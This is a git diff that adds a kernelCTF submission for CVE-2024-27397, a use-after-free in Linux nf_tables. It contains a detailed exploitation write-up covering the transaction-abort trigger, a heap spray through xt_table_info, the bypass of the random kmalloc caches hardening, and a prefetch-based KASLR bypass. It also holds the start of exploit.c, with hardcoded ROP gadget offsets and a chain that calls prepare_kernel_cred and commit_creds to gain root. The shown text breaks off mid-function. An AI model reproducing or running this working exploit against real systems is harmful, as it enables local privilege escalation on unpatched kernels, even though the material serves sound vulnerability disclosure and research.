diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/exploit.md new file mode 100644 index 00000000..22181490 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/exploit.md @@ -0,0 +1,522 @@ +# CVE-2024-27397 + +Exploit for CVE-2024-27397 against the mitigation-v3-6.1.55 instance. +This exploit is based on my previous exploit against [CVE-2023-6817](https://github.com/google/security-research/blob/499284a767851f383681ea68e485a0620ccabce2/pocs/linux/kernelctf/CVE-2023-6817_mitigation/docs/exploit.md) +My goal was to re-use as much as possible, therefor the only differing bits will be in the initial setup to trigger CVE-2024-27397. +The rest of the original writeup will be recited for completeness sake. + +## Abusing the vulnerability + +Similar to CVE-2023-6817, the bug behind CVE-2024-27397 resides in the nftables subsystem. +(If you are unfamiliar, you may want to briefly read the +[docs](https://wiki.nftables.org/wiki-nftables/index.php/Quick_reference-nftables_in_10_minutes)) + +To recap, the goal of the original exploit was to create a setup like so: +- a table `T` containing: + - a set `S`, which contains + - an `NFT_JUMP` verdict to chain `B` + - a base chain `A`, which contains + - a rule with an `NFT_JUMP` verdict to chain `B` + - a chain `B`, which contains + - a rule with an `NFT_RETURN` verdict + - a few junk rules + +The idea behind the setup is to eventually drop the `NFT_JUMP` verdict in `S` twice in order +to lose one reference count leading to a use-after-free on `B`. + +How do we create a similar setup using CVE-2024-27397? +In order to trigger the delay in the abort path, we need many junk operation to run. +I decided to go with the following idea (all within a single transaction, otherwise we cannot trigger the bug): +1) to existing set `S` add `NFT_JUMP` verdict to chain `B` with a very short expiration time (increment use count of `B`) +2) immediately delete set `S` (decrements use count of `B` because of verdict added in 1) which is not expired yet) +3) fill with junk operations, causing element added in 1) to expire +4) add an invalid operation causing the whole transaction to abort + +With the transaction being aborted the steps are undone in reverse order. +We are most interested in step 2: Because the verdict of 1) expired during the transaction, the +use count decrement is _not_ undone and we successfully lost a reference count to chain `B`: +```c + +// i) transaction aborts (nf_tables_api.c): +static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action) +{ +// ... +case NFT_MSG_DELSET: + nft_use_inc_restore(&trans->ctx.table->use); + nft_clear(trans->ctx.net, nft_trans_set(trans)); + if (nft_trans_set(trans)->flags & (NFT_SET_MAP | NFT_SET_OBJECT)) + nft_map_activate(&trans->ctx, nft_trans_set(trans)); // our set is re-activated + + nft_trans_destroy(trans); + break; +// ... +} + +// ii) set is re-activated, performs a walk on the set +static void nft_map_activate(const struct nft_ctx *ctx, struct nft_set *set) +{ + struct nft_set_iter iter = { + .genmask = nft_genmask_next(ctx->net), + .fn = nft_mapelem_activate, + }; + + set->ops->walk(ctx, set, &iter); +// ... +} + +// iii) follow a walk, f.e. nft_set_rbtree.c: +static void nft_rbtree_walk(/* ... */) +{ +// ... + + // iter all elements + for (node = rb_first(&priv->root); node != NULL; node = rb_next(node)) { + rbe = rb_entry(node, struct nft_rbtree_elem, node); + // ... + + // check if the element expired: Uses the system time for comparison: oh-oh + if (nft_set_elem_expired(&rbe->ext)) + goto cont; // whoops. element is expired thus we miss the re-activation below + if (!nft_set_elem_active(&rbe->ext, iter->genmask)) + goto cont; + + elem.priv = rbe; + + // activate the element again + iter->err = iter->fn(ctx, set, iter, &elem); + } +// ... +} +``` + +To prepare for the malicious transaction, we thus create the following setup: +- table `T` containing: + - set `S` (initially empty, prepared for timeout elements and verdict data) + - chain `J` (junk, used for transaction stalls) + - set `SJ_i` with (n number of sets, junk, also used for transaction stalls) + - m times: verdict `NFT_JUMP` chain `J` + - chain A (basechain) + - `NFT_JUMP` chain B (1 use initially) + - chain B + - `NFT_RETURN` + - a few junk rules + +In order to satisfy step 3) from above, I decided to delete _n_ junk sets, +each containing _m_ elements, which introduces a sufficiently large delay with +sane parameters _n_ and _m_. The exploit uses 50 and 50000 respectively. + +With the specific setup out of the way, the following is taken from the original +writeup of the exploit for CVE-2023-6817: + +With the chain `B` use count decremented an additional time, the chain can +now be deleted even though chain `A` still contains an `NFT_JUMP` to it. + +When chain `A` is triggered the following code is reached: +```c +// in net/netfilter/nf_tables_core.c +unsigned int +nft_do_chain(struct nft_pktinfo *pkt, void *priv) +{ + const struct nft_chain *chain = priv, *basechain = chain; + const struct nft_rule_dp *rule, *last_rule; + const struct nft_expr *expr, *last; + struct nft_regs regs = {}; + struct nft_rule_blob *blob; + /* ... snip ... */ + +do_chain: + if (genbit) + blob = rcu_dereference(chain->blob_gen_1); // [2.1] + else + blob = rcu_dereference(chain->blob_gen_0); + + rule = (struct nft_rule_dp *)blob->data; + last_rule = (void *)blob->data + blob->size; // [2.2] +next_rule: + regs.verdict.code = NFT_CONTINUE; + for (; rule < last_rule; rule = nft_rule_next(rule)) { // [2.3] + nft_rule_dp_for_each_expr(expr, last, rule) { + /* ... snip ... */ + if (expr->ops != &nft_payload_fast_ops || + !nft_payload_fast_eval(expr, ®s, pkt)) // [2.4] + expr_call_ops_eval(expr, ®s, pkt); // [2.5] + + if (regs.verdict.code != NFT_CONTINUE) + break; + } + + /* ... snip ... */ + + break; + } + + /* ... snip ... */ + + switch (regs.verdict.code) { + case NFT_JUMP: + if (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE)) + return NF_DROP; + jumpstack[stackptr].chain = chain; + jumpstack[stackptr].rule = nft_rule_next(rule); + jumpstack[stackptr].last_rule = last_rule; + stackptr++; + fallthrough; + case NFT_GOTO: + chain = regs.verdict.chain; // [2.6] + goto do_chain; + case NFT_CONTINUE: + case NFT_RETURN: + break; + default: + WARN_ON_ONCE(1); + } + + /* ... snip ... */ + + return nft_base_chain(basechain)->policy; +} +``` + +Since chain `A` contains a jump to chain `B`, the (now freed) chain pointer +to `B` is used as the current chain ([2.6]) and the `do_chain` loop is repeated. + +While all the rules in the chain, and expressions in the rule are iterated +([2.3]), eventually the `expr->ops->eval()` function pointer is called in +`expr_call_ops_eval` ([2.5]). +This leaves us with a good candidate for gaining RIP control because we have full +control over the chain object since we freed it earlier. + +## Mitigation Notes + +We are targeting the mitigation instance, thus we have to take care of the extra +hardening options. Specifically we are interested in the following: +- `CONFIG_SLAB_VIRTUAL` +- `CONFIG_KMALLOC_SPLIT_VARSIZE` +- `CONFIG_RANDOM_KMALLOC_CACHES` + +We will acknowledge `CONFIG_SLAB_VIRTUAL` assuming it is a sane mitigation against +cross cache attacks. +Therefor we have to find our way around the other two. + +Looking at the allocation sites for the `struct nft_chain` object, we can +observe typicall calls to `kzalloc(sizeof(*chain), GFP_KERNEL_ACCOUNT)` leaving +the object subject to any of the `kmalloc-128-cg-X` caches (X being one of +the random ones). +This is hard to deal with, therefor we are looking for a way to pivot into one +of the `dyn-*` caches (`CONFIG_KMALLOC_SPLIT_VARSIZE`). +Luckily the `struct nft_chain` object contains plenty of pointers to other objects. +Additionally, when the chain object is destroyed, none of the pointers are cleared +(see `nf_tables_chain_destroy()` in `net/netfilter/nf_tables_api.c`). +Therefor we have access to additional objects, following all the freed helper +objects referenced by the original chain object. +We will focus on objects which are referenced during a chain walk in +`nft_do_chain`, other objects may be suitable for double-free scenarios but +we will not try to do that. + +Thanks to the `CONFIG_RANDOM_KMALLOC_CACHES` hardening, the noise level in +the individual caches is extremely low. +Therefor we can assume that none of the original pointers will be corrupted when +we try to prepare the nested use-after-free. + +```c +struct nft_chain { + struct nft_rule_blob __rcu *blob_gen_0; + struct nft_rule_blob __rcu *blob_gen_1; + struct list_head rules; + struct list_head list; + struct rhlist_head rhlhead; + struct nft_table *table; + u64 handle; + u32 use; + u8 flags:5, + bound:1, + genmask:2; + char *name; + u16 udlen; + u8 *udata; + struct nft_rule_blob *blob_next; +}; +``` +The main pointers we are interesting in are the `blob_gen_{0,1}` members. +Each one is pointing to the current rule "generation" depending on the +`genmask` bits. +These rule blobs are allocated using `nf_tables_chain_alloc_rules`: +```c +static struct nft_rule_blob *nf_tables_chain_alloc_rules(unsigned int size) +{ + struct nft_rule_blob *blob; + + /* .. snip .. */ + + blob = kvmalloc(size, GFP_KERNEL_ACCOUNT); + + /* .. snip .. */ + return blob; +} +``` +Fortunate for us, blobs move into the `dyn-kmalloc-SIZE-cg-X` caches. + +Still, we have to defeat `CONFIG_RANDOM_KMALLOC_CACHES` in order to find a +suitable object which can be used to reclaim the freed blob objects. +In order to achieve that, we will abuse a minor implementation issue of the random +kmalloc caches hardening. + +Peeking at the generated code for the `kvmalloc()` call, we will notice that +it is inlined to a call to `kvmalloc_node()`: + +```objdump +ffffffff813715f0 : +ffffffff813715f0: e8 cb 5a da ff call ffffffff811170c0 <__fentry__> +ffffffff813715f5: 41 54 push %r12 +ffffffff813715f7: 41 89 d4 mov %edx,%r12d +ffffffff813715fa: 55 push %rbp +ffffffff813715fb: 48 89 fd mov %rdi,%rbp +ffffffff813715fe: 53 push %rbx +ffffffff813715ff: 89 f3 mov %esi,%ebx +ffffffff81371601: 48 81 ff 00 10 00 00 cmp $0x1000,%rdi +ffffffff81371608: 77 09 ja ffffffff81371613 +ffffffff8137160a: 5b pop %rbx +ffffffff8137160b: 5d pop %rbp +ffffffff8137160c: 41 5c pop %r12 +ffffffff8137160e: e9 dd cc 00 00 jmp ffffffff8137e2f0 <__kmalloc_node> [3.1] +ffffffff81371613: 89 f0 mov %esi,%eax +ffffffff81371615: 81 ce 00 20 01 00 or $0x12000,%esi +ffffffff8137161b: 80 cc 20 or $0x20,%ah +ffffffff8137161e: f6 c7 40 test $0x40,%bh +ffffffff81371621: 0f 45 f0 cmovne %eax,%esi +ffffffff81371624: 81 e6 ff 7f ff ff and $0xffff7fff,%esi +ffffffff8137162a: e8 c1 cc 00 00 call ffffffff8137e2f0 <__kmalloc_node> [3.2] +... +``` + +As you can see in the snippet above, the call to `__kmalloc_node` is a proper +tail call when the size is smaller than `PAGE_SIZE` ([3.1]). +Otherwise the call will be explicit ([3.2]). + +This is problematic because `__kmalloc_node` will use the return address as +the seed to derive the *random* cache to use. +Since all calls to `kvmalloc_node` will use the same seed when the size is large, +the hardening is rendered completely pointless. +Therefor our goal will be to increase the allocation size such that we hit the +`dyn-kmalloc-8192-cg` cache. + +## Heap Spray + +To recap, our setup consists of a chain `A` with a jump to a freed "chain" `B`. +We want to target the `blob_gen_{0,1}` members of type `struct nft_rule_blob` of +this freed object. + +A `struct nft_rule_blob` is basically a flat binary blob of `struct nft_rule_dp`(s) +which are flat binary blobs of `struct nft_expr`: +```c +struct nft_expr { + const struct nft_expr_ops *ops; + unsigned char data[] + __attribute__((aligned(__alignof__(u64)))); +}; + +struct nft_rule_dp { + u64 is_last:1, + dlen:12, + handle:42; /* for tracing */ + unsigned char data[] + __attribute__((aligned(__alignof__(struct nft_expr)))); +}; + +struct nft_rule_blob { + unsigned long size; + unsigned char data[] + __attribute__((aligned(__alignof__(struct nft_rule_dp)))); +}; +``` + +In order to increase the size of the blobs we can simply add many rules, each +containing a few expressions so that the size increases. + +Now we only need an object which can be used to spray a controlled payload +using the same allocation primitive. +The most convenient object is `struct xt_table_info`: +```c +struct xt_table_info { + unsigned int size; // [4.1] + unsigned int number; + unsigned int initial_entries; + unsigned int hook_entry[NF_INET_NUMHOOKS]; + unsigned int underflow[NF_INET_NUMHOOKS]; + unsigned int stacksize; + void ***jumpstack; + + unsigned char entries[] __aligned(8); +}; + +// in net/netfilter/x_tables.c +struct xt_table_info *xt_alloc_table_info(unsigned int size) +{ + struct xt_table_info *info = NULL; + size_t sz = sizeof(*info) + size; + + if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE) + return NULL; + + info = kvmalloc(sz, GFP_KERNEL_ACCOUNT); + if (!info) + return NULL; + + memset(info, 0, sizeof(*info)); + info->size = size; // [4.2] + return info; +} + +static int +do_replace(struct net *net, sockptr_t arg, unsigned int len) +{ + int ret; + struct ipt_replace tmp; + struct xt_table_info *newinfo; + void *loc_cpu_entry; + struct ipt_entry *iter; + + if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0) + return -EFAULT; + + /* .. snip .. */ + + newinfo = xt_alloc_table_info(tmp.size); // [4.3] + if (!newinfo) + return -ENOMEM; + + loc_cpu_entry = newinfo->entries; + if (copy_from_sockptr_offset(loc_cpu_entry, arg, sizeof(tmp), // [4.4] + tmp.size) != 0) { + ret = -EFAULT; + goto free_newinfo; + } + + /* .. snip .. */ + + free_newinfo: + xt_free_table_info(newinfo); + return ret; +} +``` + +Revisiting the code which is triggered during an nftables chain evaluation, +we need to have a sane `blob->size` member initialized ([2.2]), otherwise +individual rules in the blob would not be iterated. +This filters objects which have pointers or zeros as the first member, but +the `struct xt_table_info.size` member fits perfectly ([4.1]). + +As seen on the `struct xt_table_info` allocation site, the whole structure is +cleared to zero on allocation and the size is set to the user provided value ([4.2]). +Eventually the full user provided payload is copied into the allocated buffer +prior to any sanitization ([4.4]). +In order to skip the sanitization step, we can simply force a fault during the +user copy. +Though this immediately frees our payload again, the content we care about is +written, and free list randomization will ensure that we can exhaust the full +cache with our fake objects. + +Note that there is a `60` bytes hole between the payload and the size member. +These bytes are all zero, which fits the iteration in `nft_do_chain` perfectly. +Inspecting the macro expansion of the expression iteration (see [2.3]), we can see +that the loop exits before the first iteration because `rule->dlen` is zero: +```c +for ((expr) = (struct nft_expr *)&rule->data[0], + (last) = (struct nft_expr *)&rule->data[rule->dlen]; + (expr) != (last); (expr) = ((void *)expr) + expr->ops->size) +{ /* .. */ } +``` + +Since the verdict is initialized to `NFT_CONTINUE` we continue iterating +rules until our actual payload is hit. + +## Payload Considerations + +When our payload is triggered in `expr_call_ops_eval()` the following arguments +are provided (in RDI, RSI, RDX respectively): +```c + expr->ops->eval(expr, regs, pkt); +``` + +In order to resolve the pointer indirection required for dereferencing +`expr->ops->eval` we will utilize the deterministically known location of the +exception stacks in the CPU entry area. This issue is not fixed in the targeted +LTS release, thus useable for us. This technique is well known and has been +documented several times (CVE-2023-0597). + +We have full control over `expr` (the payload we sprayed) and limited control +over `regs` (the registers used by the nftables evaluation machine, which can be +read / written through expressions) and limited control over `pkt` which +contains data from the packet that we send to trigger the evaluation. + +At the point of evaluation we are in an interrupt context, thus we have to be +more careful in order maximize the reliability. +I chose to restore execution directly at the end of the `nft_do_chain` function +call. + +Since there are better jump gadgets using `rsi` we will setup a simple stack +pivot to `rdi` while using gadget pointers in the `regs` buffer. +In order to control the `regs` buffer we will utilize the fast paths for +expression evaluation, specifically the `nft_payload_fast_eval` call ([2.4]). +Through the creation of fake `struct nft_payload` expressions we can copy +data from the packet into the registers `regs`. + +With a stack pivot setup into the fully controllable `expr` buffer, a +privilege escalation payload can be assembled trivially. + +Finally, we only need to restore the stack to the previous state and eventually +jump into the `nft_do_chain` function trailer: +```objdump +ffffffff81e51380 : +ffffffff81e51380: e8 3b 5d 2c ff call ffffffff811170c0 <__fentry__> +ffffffff81e51385: 41 57 push %r15 +... +ffffffff81e5139a: 48 81 ec 20 02 00 00 sub $0x220,%rsp +ffffffff81e513a1: 65 48 8b 04 25 28 00 mov %gs:0x28,%rax +ffffffff81e513aa: 48 89 84 24 18 02 00 mov %rax,0x218(%rsp) +ffffffff81e513b2: 48 8b 47 08 mov 0x8(%rdi),%rax +ffffffff81e513b6: 4c 8d 64 24 48 lea 0x48(%rsp),%r12 [5.1] + +... + +ffffffff81e517e4: 48 81 c4 20 02 00 00 add $0x220,%rsp +ffffffff81e517eb: 89 d0 mov %edx,%eax [5.2] +ffffffff81e517ed: 5b pop %rbx +ffffffff81e517ee: 5d pop %rbp +ffffffff81e517ef: 41 5c pop %r12 +ffffffff81e517f1: 41 5d pop %r13 +ffffffff81e517f3: 41 5e pop %r14 +ffffffff81e517f5: 41 5f pop %r15 +ffffffff81e517f7: e9 84 34 5b 00 jmp ffffffff82404c80 <__x86_return_thunk> +``` + +Looking at the beginning of the function, we can see that a pointer to the original +stack pointer is preserved in `r12`. +By selecting gadgets which do not clobber `r12` we will use this as a way +to restore the stack pointer. +Since we do control a lot of space in the CPU entry area, we can easily setup +a few jump gadgets which pivot the stack back from `expr` to the pointer in`r12`. +Eventually we will jump to the function trailer ([5.2]) and set the +return value to `NF_DROP` to make sure that we are not being called again. + +## KASLR Bypass + +We will use a `prefetch` timing side channel to bypass KASLR reliably. +The code for that is adapted from [here](https://github.com/IAIK/prefetch/blob/master/cacheutils.h). +We use a 7-trials majority vote for our final result. + +Since this does not work on the AMD EPYC CPU used by the CI reproduction runner, +we use a slightly different approach when running the reproduction (use +`make real_exploit` for the real exploit which captured the flag). + +It can be observed that the prefetch timings on the AMD CPU are significantly +larger when the memory is mapped by the kernel (contrary to the Intel CPU where +the timings are significantly lower for such memory). +We therefor "inverse" our timing logic and choose a region of contiguously mapped +memory that looks like the kernel text region. +When such a region is found, we assume it as base for KASLR. + +## Reliability + +The exploit should be close to 100% reliable as long as the KASLR leak is correct. +KASLR success chances varied from 90%-100% during local testing. diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/vulnerability.md new file mode 100644 index 00000000..277f9116 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/docs/vulnerability.md @@ -0,0 +1,16 @@ +- Requirements: + - Capabilites: CAP_NET_ADMIN + - Kernel configuration: CONFIG_NF_TABLES=y + - User namespaces required: Yes +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=c3e1b005ed1c +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7395dfacfff65e9938ac0889dafa1ab01e987d15 +- Affected Version: v4.1 - v6.8 +- Affected Component: netfilter, nftables +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27397 +- Cause: Use-After-Free + +A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. +NFT sets and their elements can have associated timeouts. +These timeouts are checked against the live system clock to assess expiration (see `nft_set_elem_expired` in `nf_tables.h`). +This causes issues when the elements expire during a transaction, leading to an asymmetric clean-up operation in a potential transaction +rollback, missing f. e. required reference count updates. diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/Makefile b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/Makefile new file mode 100644 index 00000000..63690f18 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/Makefile @@ -0,0 +1,6 @@ + +exploit: exploit.c netlink.c + $(CC) -O3 -ggdb -static -Wall -lpthread -o $@ $^ + +real_exploit: exploit.c netlink.c + $(CC) -O3 -ggdb -static -Wall -lpthread -DKASLR_BYPASS_INTEL=1 -o exploit $^ diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit new file mode 100755 index 00000000..eb0e9904 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit.c b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit.c new file mode 100644 index 00000000..de83b970 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-27397_mitigation/exploit/mitigation-v3-6.1.55/exploit.c @@ -0,0 +1,1612 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; + +#include "netlink.h" + +#define FAIL_IF(x) if ((x)) { \ + perror(#x); \ + return -1; \ +} +#define PANIC_IF(x) if ((x)) { \ + perror(#x); \ + exit(errno); \ +} +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +inline static int _pin_to_cpu(int id) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(id, &set); + return sched_setaffinity(getpid(), sizeof(set), &set); +} + +#define MY_TABLE "T", strlen("T") +#define MY_SET "S", strlen("S") +#define CHAIN_A "chainA", strlen("chainA") +#define CHAIN_B "chainB", strlen("chainB") +#define CHAIN_JUNK "J", strlen("J") + +#define MAX_NUM_JUNK_OPS 50 +#define NUM_ELEMS_JUNK_SET 50000 +#define NUM_ELEMS_PER_BATCH 90 +static u16 generate_set_name(u16 index) { + u8 low = index / 24; + u8 high = index % 24; + + return (u16)('0' + low) | ((u16)('a' + high) << 8); +} + +#define MY_KEY_LEN 4 +#define MY_KEY "AAAA", MY_KEY_LEN + +// +// offsets +// + +// ffffffff81e09097: push rdi; jmp qword ptr [rsi+0xf]; 4c57ff660f +u64 push_rdi_jmp_rsi_0xf = 0xffffffff81e09097; + +// ffffffff8126df29: pop rsp; add rsp, 0x20; pop rbx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 5c4883c4205be94c6d1901c3 +u64 pop_rsp_add_rsp_0x20_pop_rbx = 0xffffffff8126df29; + +// ffffffff81251258: pop rdx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 5ae9223a1b01c3 +u64 pop_rdx = 0xffffffff81251258; +// ffffffff818180b4: pop rbp; jmp __x86_return_thunk (0xffffffff82404c80); ret; 5de9c6cbbe00c3 +u64 pop_rbp = 0xffffffff818180b4; + +// ffffffff8102871c: pop rcx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 59e95ec53d01c3 +u64 pop_rcx = 0xffffffff8102871c; +// ffffffff818344a5: push rax; jmp qword ptr [rcx]; 50ff21 +u64 push_rax_jmp_rcx = 0xffffffff818344a5; +// ffffffff81dadf48: pop rsp; jmp qword ptr [rsi+0xf]; 5cff660f +u64 pop_rsp_jmp_rsi_0xf = 0xffffffff81dadf48; + +// ffffffff81bc9099: lea rax, [r12+rbp]; pop rbx; pop rbp; pop r12; pop r13; pop r14; jmp __x86_return_thunk (0xffffffff82404c80); ret; 498d042c5b5d415c415d415ee9d6bb8300c3 +u64 lea_rax_r12_plus_rbp_pop5 = 0xffffffff81bc9099; + +// ffffffff812f9168: pop rdi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 5fe912bb1001c3 +u64 pop_rdi = 0xffffffff812f9168; + +// ffffffff8124f56d: 48 89 c7 mov %rax,%rdi +// ffffffff8124f570: 48 89 3d d1 b9 23 03 mov %rdi,0x323b9d1(%rip) # ffffffff8448af48 +// ffffffff8124f577: e9 04 57 1b 01 jmp ffffffff82404c80 <__x86_return_thunk> +u64 mov_rdi_rax = 0xffffffff8124f56d; + +// ffffffff81bd1748: pop rsi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 5ee932358300c3 +u64 pop_rsi = 0xffffffff81bd1748; + +// function trailer for nft_do_chain +u64 nft_do_chain_leave = 0xffffffff81e517eb; + +// we use this for the fast path to copy some data from the skb into RSI +u64 nft_payload_fast_ops = 0xffffffff82b27580; + +u64 find_task_by_vpid = 0xffffffff811bbe60; +u64 switch_task_namespaces = 0xffffffff811c3a30; +u64 commit_creds = 0xffffffff811c55a0; +u64 prepare_kernel_cred = 0xffffffff811c5840; +u64 init_task = 0xffffffff83815a40; +u64 init_nsproxy = 0xffffffff83876720; + +// ffffffff810ebbdd: add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404c80); ret; 4881c488000000e997903101c3 +u64 add_rsp_0x88 = 0xffffffff810ebbdd; + + +#define FOR_ALL_OFFSETS(x) do { \ + x(push_rdi_jmp_rsi_0xf); \ + x(pop_rsp_add_rsp_0x20_pop_rbx); \ + x(pop_rdx); \ + x(pop_rbp); \ + x(pop_rcx); \ + x(push_rax_jmp_rcx); \ + x(pop_rsp_jmp_rsi_0xf); \ + x(lea_rax_r12_plus_rbp_pop5); \ + x(pop_rdi); \ + x(mov_rdi_rax); \ + x(pop_rsi); \ + x(add_rsp_0x88); \ + x(nft_do_chain_leave); \ + x(nft_payload_fast_ops); \ + x(find_task_by_vpid); \ + x(switch_task_namespaces); \ + x(commit_creds); \ + x(prepare_kernel_cred); \ + x(init_task); \ + x(init_nsproxy); \ + } while(0) + +// +// +// + +// just use side channels +int bypass_kaslr(u64 base); + +// CPU entry area pointers. We prepare some memory here that will be referenced +// by the ROP chains. +// We need: +// - the struct nft_expr_ops { .eval } member +// - a pivot gadget to restore the stack +// - and a pointer to the nft_do_chain function trailer so that we jump to it. +#define CPU_ENTRY_AREA_BASE(cpu) (0xfffffe0000001000ull + (u64)cpu * 0x3b000) +#define PAYLOAD_LOCATION(cpu) (CPU_ENTRY_AREA_BASE(cpu) + 0x1f58) +#define MAIN_CPU 0 +#define HELPER_CPU 1 + +struct cpu_entry_area_payload { + union { + struct { + // function to call to evaluate the expression + u64 nft_expr_eval; + // stack pivot gadget to go back to normal execution + u64 pop_rsp_jmp_rsi_0xf; + // nft_do_chain jump target to restore execution + u64 nft_do_chain_leave; + }; + u64 regs[16]; + }; +}; + + +// Our payload which will reclaim the object in chain->{blob_gen_1,blob_gen_0} +// This is essentially a struct nft_rule_blob with a single rule +// This rule than has 4 expressions which will run our payload. +struct payload { + // This is provided by struct xt_table_info->size + #if 0 + // blob size + u64 size; + #endif + + // + // note that we omit a hole of ~60 bytes which is all zero + // + + // rule data (1 rule) + u64 is_last:1, dlen:12, handle:42; + + // We use this to setup the regs argument passed to our following fake_expr in RSI. + // Essentially these exprs will copy data from the packet into the regs. + // We need it for our stack pivot. + struct { + u64 fast_ops; + u8 base; + u8 offset; + u8 len; + u8 dreg; + u32 __padding; + } __attribute__((__packed__)) fast_exprs[3] __attribute__((aligned(__alignof__(u64))));; + + // Actual call into our rop chain + struct { + u64 fake_ops; + u64 rop_chain[128]; + } fake_expr; +}; + +static u32 rop_chain_rsi[6] = {}; +static struct payload payload = {}; + +void setup_registers(struct payload* payload) { + // this function sets up the part of the payload which sets up the nft_regs structure + // in nft_do_chain. + // essentially we copy a stack pivot gadget into them + // the payload will be copied directly from the packet we send to trigger the payload + + *(u64*)((u8*)rop_chain_rsi + 0xF) = pop_rsp_add_rsp_0x20_pop_rbx; + + const u32* regs = rop_chain_rsi; + int j = 0; + for (int i = 0; i < 6; i++) { + if (regs[i] == 0) { + continue; + } + + payload->fast_exprs[j].fast_ops = nft_payload_fast_ops; + payload->fast_exprs[j].base = NFT_PAYLOAD_NETWORK_HEADER; + // offset of our skb payload data + payload->fast_exprs[j].offset = 0x1c + i * 4; + payload->fast_exprs[j].len = 4; + payload->fast_exprs[j].dreg = i; + + j++; + } + + #if 0 + payload->size = sizeof(struct payload) - 8; // offsetof(struct payload, is_last); + #endif + payload->is_last = 0; + payload->dlen = sizeof(struct payload) - offsetof(struct payload, fast_exprs); + payload->handle = 0xDEAD; +} + +void setup_rop_chain(struct payload* payload) { + payload->fake_expr.fake_ops = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, nft_expr_eval); + + // top of stack points contains &payload->fake_expr + // we jump into this using this gadget: + // pop rsp; add rsp, 0x20; pop rbx; jmp __x86_return_thunk (0xffffffff82404c80); ret; + + u64* rop_chain = payload->fake_expr.rop_chain; + int i = 0x20 / 8; + + // had some issue with object boundaries. Lets get some more stack space .. + rop_chain[i++] = add_rsp_0x88; + i += 0x88 / 8; + rop_chain[i++] = add_rsp_0x88; + i += 0x88 / 8; + rop_chain[i++] = add_rsp_0x88; + i += 0x88 / 8; + rop_chain[i++] = add_rsp_0x88; + i += 0x88 / 8; + #if 0 + rop_chain[i++] = add_rsp_0x88; + i += 0x88 / 8; + rop_chain[i++] = add_rsp_0x88; + i += 0x88 / 8; + rop_chain[i++] = add_rsp_0x88; + i += 0x88 / 8; + rop_chain[i++] = add_rsp_0x88; + i += 0x88 / 8; + #endif + + rop_chain[i++] = pop_rdi; + rop_chain[i++] = init_task; + rop_chain[i++] = prepare_kernel_cred; + + rop_chain[i++] = mov_rdi_rax; + rop_chain[i++] = commit_creds; + + rop_chain[i++] = pop_rdi; + rop_chain[i++] = 1; + rop_chain[i++] = find_task_by_vpid; + + rop_chain[i++] = mov_rdi_rax; + rop_chain[i++] = pop_rsi; + rop_chain[i++] = init_nsproxy; + rop_chain[i++] = switch_task_namespaces; + + // prepare to restore execution + // nft_do_chain: + // entry: + // sub 0x220 rsp + // lea r12, [rsp+0x48] + // exit: + // ffffffff81e517eb: 89 d0 mov %edx,%eax + rop_chain[i++] = pop_rbp; + rop_chain[i++] = 0x220 - 0x48; + rop_chain[i++] = lea_rax_r12_plus_rbp_pop5; + i += 5; + + // prepare the stack restore gadget + rop_chain[i++] = pop_rcx; + rop_chain[i++] = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, pop_rsp_jmp_rsi_0xf); + + // prepare the return jmp gadget + rop_chain[i++] = pop_rsi; + rop_chain[i++] = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, nft_do_chain_leave) - 0xf; + + // setup the return vaule + rop_chain[i++] = pop_rdx; + rop_chain[i++] = NF_DROP; + + // actually restore execution + rop_chain[i++] = push_rax_jmp_rcx; +} + +static struct nlmsghdr* begin_batch_chunk(struct nlmsghdr* nlh) { + nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len); + return nlmsg_end(nlh); +} + +static void end_batch_chunk(struct nlmsghdr* batch, struct nlmsghdr* nlh) { + batch->nlmsg_len += nlh->nlmsg_len; +} + +static void add_verdict_data(struct nlattr* attr, u16 type, u32 code, ...) { + va_list ap; + 